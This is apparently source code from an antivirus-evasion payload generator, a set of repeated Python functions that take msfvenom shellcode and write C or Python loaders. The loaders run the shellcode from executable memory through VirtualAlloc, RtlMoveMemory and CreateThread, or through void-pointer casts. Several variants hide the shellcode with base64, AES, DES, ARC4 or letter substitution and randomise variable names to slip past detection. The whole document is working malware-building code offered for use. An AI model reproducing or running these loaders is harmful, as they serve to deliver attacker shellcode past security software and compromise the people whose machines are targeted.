def cVirtualAlloc(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names RandShellcode = randomizer.randomString() RandReverseShell = randomizer.randomString() RandMemoryShell = randomizer.randomString() # Start creating our C payload PayloadFile = open('payload.c', 'w') PayloadFile.write('#include <windows.h>\n') PayloadFile.write('#include <stdio.h>\n') PayloadFile.write('#include <string.h>\n') PayloadFile.write('int main()\n') PayloadFile.write('{\n') PayloadFile.write(' LPVOID lpvAddr;\n') PayloadFile.write(' HANDLE hHand;\n') PayloadFile.write(' DWORD dwWaitResult;\n') PayloadFile.write(' DWORD threadID;\n\n') PayloadFile.write('unsigned char buff[] = \n') PayloadFile.write('\"' + Shellcode + '\";\n\n') PayloadFile.write( 'lpvAddr = VirtualAlloc(NULL, strlen(buff),0x3000,0x40);\n') PayloadFile.write('RtlMoveMemory(lpvAddr,buff, strlen(buff));\n') PayloadFile.write( 'hHand = CreateThread(NULL,0,lpvAddr,NULL,0,&threadID);\n') PayloadFile.write('dwWaitResult = WaitForSingleObject(hHand,INFINITE);\n') PayloadFile.write('return 0;\n') PayloadFile.write('}') PayloadFile.close() # Compile our C code csupport.compilemingw()
def pyVirtualAlloc(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names ShellcodeVariableName = randomizer.randomString() RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() # Create Payload File PayloadFile = open('payload.py', 'w') PayloadFile.write('#!/usr/bin/python\n\n') PayloadFile.write('import ctypes\n\n') PayloadFile.write(ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n\n') PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n') PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n') PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n') PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n') PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))') PayloadFile.close() # Create Supporting Files and Print Exit Message supportfiles.supportingFiles() messages.endmsg()
def cVirtualAlloc(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names RandShellcode = randomizer.randomString() RandReverseShell = randomizer.randomString() RandMemoryShell = randomizer.randomString() # Start creating our C payload PayloadFile = open("payload.c", "w") PayloadFile.write("#include <windows.h>\n") PayloadFile.write("#include <stdio.h>\n") PayloadFile.write("#include <string.h>\n") PayloadFile.write("int main()\n") PayloadFile.write("{\n") PayloadFile.write(" LPVOID lpvAddr;\n") PayloadFile.write(" HANDLE hHand;\n") PayloadFile.write(" DWORD dwWaitResult;\n") PayloadFile.write(" DWORD threadID;\n\n") PayloadFile.write("unsigned char buff[] = \n") PayloadFile.write('"' + Shellcode + '";\n\n') PayloadFile.write("lpvAddr = VirtualAlloc(NULL, strlen(buff),0x3000,0x40);\n") PayloadFile.write("RtlMoveMemory(lpvAddr,buff, strlen(buff));\n") PayloadFile.write("hHand = CreateThread(NULL,0,lpvAddr,NULL,0,&threadID);\n") PayloadFile.write("dwWaitResult = WaitForSingleObject(hHand,INFINITE);\n") PayloadFile.write("return 0;\n") PayloadFile.write("}") PayloadFile.close() # Compile our C code csupport.compilemingw()
def pyb64VAlloc(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = randomizer.randomString() RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() RandT = randomizer.randomString() # Create Payload File PayloadFile = open('payload.py', 'w') PayloadFile.write('#!/usr/bin/python\n\n') PayloadFile.write('import ctypes\n') PayloadFile.write('import base64\n\n') PayloadFile.write(RandT + " = \"" + EncodedShellcode + "\"\n") PayloadFile.write(ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n") PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n') PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n') PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n') PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n') PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))') PayloadFile.close() # Create Supporting Files and Print Exit Message supportfiles.supportingFiles() messages.endmsg()
def pyAESVAlloc(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names ShellcodeVariableName = randomizer.randomString() RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() RandDecodeAES = randomizer.randomString() RandCipherObject = randomizer.randomString() RandDecodedShellcode = randomizer.randomString() RandShellCode = randomizer.randomString() RandPadding = randomizer.randomString() # Set AES Block Size and Padding BlockSize = 32 Padding = '{' # Function for Padding Encrypted Text to Fit the Block pad = lambda s: s + (BlockSize - len(s) % BlockSize) * Padding # Encrypt & Encode or Decrypt & Decode a String EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s))) DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(Padding) # Generate Random AES Key secret = aes.aesKey() # Create Cipher Object with Generated Secret Key cipher = AES.new(secret) # Encrypt the String EncodedShellcode = EncodeAES(cipher, Shellcode) # Create Payload File PayloadFile = open('payload.py', 'w') PayloadFile.write('#!/usr/bin/python\n\n') PayloadFile.write('import ctypes\n') PayloadFile.write('from Crypto.Cipher import AES\n') PayloadFile.write('import base64\n') PayloadFile.write('import os\n\n') PayloadFile.write(RandPadding + ' = \'{\'\n') PayloadFile.write(RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n') PayloadFile.write(RandCipherObject + ' = AES.new(\'' + secret + '\')\n') PayloadFile.write(RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n') PayloadFile.write(RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n\n') PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n') PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n\n') PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n\n') PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n') PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))') PayloadFile.close() # Create Supporting Files and Print Exit Message supportfiles.supportingFiles() messages.endmsg()
def pyLetterSubVAlloc(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names SubbedShellcodeVariableName = randomizer.randomString() ShellcodeVariableName = randomizer.randomString() RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() RandDecodedLetter = randomizer.randomString() RandCorrectLetter = randomizer.randomString() RandSubScheme = randomizer.randomString() # Letter Substitution Variables EncodeWithThis = "c" DecodeWithThis = "t" # Create Letter Substitution Scheme SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis) # Escaping Shellcode Shellcode = Shellcode.encode("string_escape") # Create Payload File PayloadFile = open('payload.py', 'w') PayloadFile.write('#!/usr/bin/python\n\n') PayloadFile.write('import ctypes\n') PayloadFile.write('from string import maketrans\n\n') PayloadFile.write(RandDecodedLetter + ' = "t"\n') PayloadFile.write(RandCorrectLetter + ' = "c"\n\n') PayloadFile.write(RandSubScheme + ' = maketrans('+ RandDecodedLetter +', '+ RandCorrectLetter + ')\n\n') PayloadFile.write(SubbedShellcodeVariableName + ' = \"'+ Shellcode.translate(SubScheme) +'\"\n\n') PayloadFile.write(SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n') PayloadFile.write(ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n\n') PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n') PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n') PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n') PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n') PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))') PayloadFile.close() # Create Supporting Files and Print Exit Message supportfiles.supportingFiles() messages.endmsg()
def cVoidPointer(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names RandShellcode = randomizer.randomString() RandReverseShell = randomizer.randomString() RandMemoryShell = randomizer.randomString() # Start creating our C payload PayloadFile = open('payload.c', 'w') PayloadFile.write('unsigned char payload[]=\n') PayloadFile.write('\"' + Shellcode + '\";\n') PayloadFile.write('int main(void) { ((void (*)())payload)();}') PayloadFile.close() # Compile our C code csupport.compilemingw()
def cVoidPointer (): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names RandShellcode = randomizer.randomString() RandReverseShell = randomizer.randomString() RandMemoryShell = randomizer.randomString() # Start creating our C payload PayloadFile = open('payload.c', 'w') PayloadFile.write('unsigned char payload[]=\n') PayloadFile.write('\"' + Shellcode + '\";\n') PayloadFile.write('int main(void) { ((void (*)())payload)();}') PayloadFile.close() # Compile our C code csupport.compilemingw()
def pyDESVAlloc(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() ShellcodeVariableName = randomizer.randomString() RandIV = randomizer.randomString() RandDESKey = randomizer.randomString() RandDESPayload = randomizer.randomString() RandEncShellCodePayload = randomizer.randomString() # Set IV Value and DES Key iv = ''.join(random.choice(string.ascii_letters) for x in range(8)) DESKey = ''.join(random.choice(string.ascii_letters + string.digits) for x in range(8)) # Create DES Object and encrypt our payload desmain = DES.new(DESKey, DES.MODE_CFB, iv) EncShellCode = desmain.encrypt(Shellcode) # Create Payload File PayloadFile = open('payload.py', 'w') PayloadFile.write('#!/usr/bin/python\n\n') PayloadFile.write('from Crypto.Cipher import DES\n') PayloadFile.write('import ctypes\n\n') PayloadFile.write(RandIV + ' = \'' + iv + '\'\n') PayloadFile.write(RandDESKey + ' = \'' + DESKey + '\'\n') PayloadFile.write(RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n\n') PayloadFile.write(RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n\n') PayloadFile.write(ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n') PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n') PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n') PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n') PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n') PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))') PayloadFile.close() # Create Supporting Files and Print Exit Message supportfiles.supportingFiles() messages.endmsg()
def pyARCVAlloc(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() ShellcodeVariableName = randomizer.randomString() RandIV = randomizer.randomString() RandARCKey = randomizer.randomString() RandARCPayload = randomizer.randomString() RandEncShellCodePayload = randomizer.randomString() # Set IV Value and DES Key iv = ''.join(random.choice(string.ascii_letters) for x in range(8)) ARCKey = ''.join(random.choice(string.ascii_letters + string.digits) for x in range(8)) # Create DES Object and encrypt our payload arc4main = ARC4.new(ARCKey) EncShellCode = arc4main.encrypt(Shellcode) # Create Payload File PayloadFile = open('payload.py', 'w') PayloadFile.write('#!/usr/bin/python\n\n') PayloadFile.write('from Crypto.Cipher import ARC4\n') PayloadFile.write('import ctypes\n\n') PayloadFile.write(RandIV + ' = \'' + iv + '\'\n') PayloadFile.write(RandARCKey + ' = \'' + ARCKey + '\'\n') PayloadFile.write(RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n\n') PayloadFile.write(RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n\n') PayloadFile.write(ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n') PayloadFile.write(RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n') PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n') PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n') PayloadFile.write(RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n') PayloadFile.write('ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))') PayloadFile.close() # Create Supporting Files and Print Exit Message supportfiles.supportingFiles() messages.endmsg()
def pyvoidpointer(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names RandShellcode = randomizer.randomString() RandReverseShell = randomizer.randomString() RandMemoryShell = randomizer.randomString() # Create Payload File PayloadFile = open("payload.py", "w") PayloadFile.write("#!/usr/bin/python\n\n") PayloadFile.write("from ctypes import *\n\n") PayloadFile.write(RandReverseShell + ' = "' + Shellcode + '"\n') PayloadFile.write( RandMemoryShell + " = create_string_buffer(" + RandReverseShell + ", len(" + RandReverseShell + "))\n" ) PayloadFile.write(RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n") PayloadFile.write(RandShellcode + "()") PayloadFile.close() # Create Supporting Files and Print Exit Message supportfiles.supportingFiles() messages.endmsg()
def pyvoidpointer(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names RandShellcode = randomizer.randomString() RandReverseShell = randomizer.randomString() RandMemoryShell = randomizer.randomString() # Create Payload File PayloadFile = open('payload.py', 'w') PayloadFile.write('#!/usr/bin/python\n\n') PayloadFile.write('from ctypes import *\n\n') PayloadFile.write(RandReverseShell + ' = \"' + Shellcode + '\"\n') PayloadFile.write(RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n') PayloadFile.write(RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n') PayloadFile.write(RandShellcode + '()') PayloadFile.close() # Create Supporting Files and Print Exit Message supportfiles.supportingFiles() messages.endmsg()
def pyLetterSubVAlloc(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names SubbedShellcodeVariableName = randomizer.randomString() ShellcodeVariableName = randomizer.randomString() RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() RandDecodedLetter = randomizer.randomString() RandCorrectLetter = randomizer.randomString() RandSubScheme = randomizer.randomString() # Letter Substitution Variables EncodeWithThis = "c" DecodeWithThis = "t" # Create Letter Substitution Scheme SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis) # Escaping Shellcode Shellcode = Shellcode.encode("string_escape") # Create Payload File PayloadFile = open('payload.py', 'w') PayloadFile.write('#!/usr/bin/python\n\n') PayloadFile.write('import ctypes\n') PayloadFile.write('from string import maketrans\n\n') PayloadFile.write(RandDecodedLetter + ' = "t"\n') PayloadFile.write(RandCorrectLetter + ' = "c"\n\n') PayloadFile.write(RandSubScheme + ' = maketrans(' + RandDecodedLetter + ', ' + RandCorrectLetter + ')\n\n') PayloadFile.write(SubbedShellcodeVariableName + ' = \"' + Shellcode.translate(SubScheme) + '\"\n\n') PayloadFile.write(SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n') PayloadFile.write(ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n\n') PayloadFile.write( RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n') PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n\n') PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n\n') PayloadFile.write( RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n' ) PayloadFile.write( 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))') PayloadFile.close() # Create Supporting Files and Print Exit Message supportfiles.supportingFiles() messages.endmsg()
def pyAESVAlloc(): # Generate Shellcode Using msfvenom Shellcode = shellcode.genShellcode() # Generate Random Variable Names ShellcodeVariableName = randomizer.randomString() RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() RandDecodeAES = randomizer.randomString() RandCipherObject = randomizer.randomString() RandDecodedShellcode = randomizer.randomString() RandShellCode = randomizer.randomString() RandPadding = randomizer.randomString() # Set AES Block Size and Padding BlockSize = 32 Padding = '{' # Function for Padding Encrypted Text to Fit the Block pad = lambda s: s + (BlockSize - len(s) % BlockSize) * Padding # Encrypt & Encode or Decrypt & Decode a String EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s))) DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(Padding) # Generate Random AES Key secret = aes.aesKey() # Create Cipher Object with Generated Secret Key cipher = AES.new(secret) # Encrypt the String EncodedShellcode = EncodeAES(cipher, Shellcode) # Create Payload File PayloadFile = open('payload.py', 'w') PayloadFile.write('#!/usr/bin/python\n\n') PayloadFile.write('import ctypes\n') PayloadFile.write('from Crypto.Cipher import AES\n') PayloadFile.write('import base64\n') PayloadFile.write('import os\n\n') PayloadFile.write(RandPadding + ' = \'{\'\n') PayloadFile.write( RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n') PayloadFile.write(RandCipherObject + ' = AES.new(\'' + secret + '\')\n') PayloadFile.write(RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n') PayloadFile.write(RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n\n') PayloadFile.write( RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n') PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n\n') PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n\n') PayloadFile.write( RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n' ) PayloadFile.write( 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))') PayloadFile.close() # Create Supporting Files and Print Exit Message supportfiles.supportingFiles() messages.endmsg()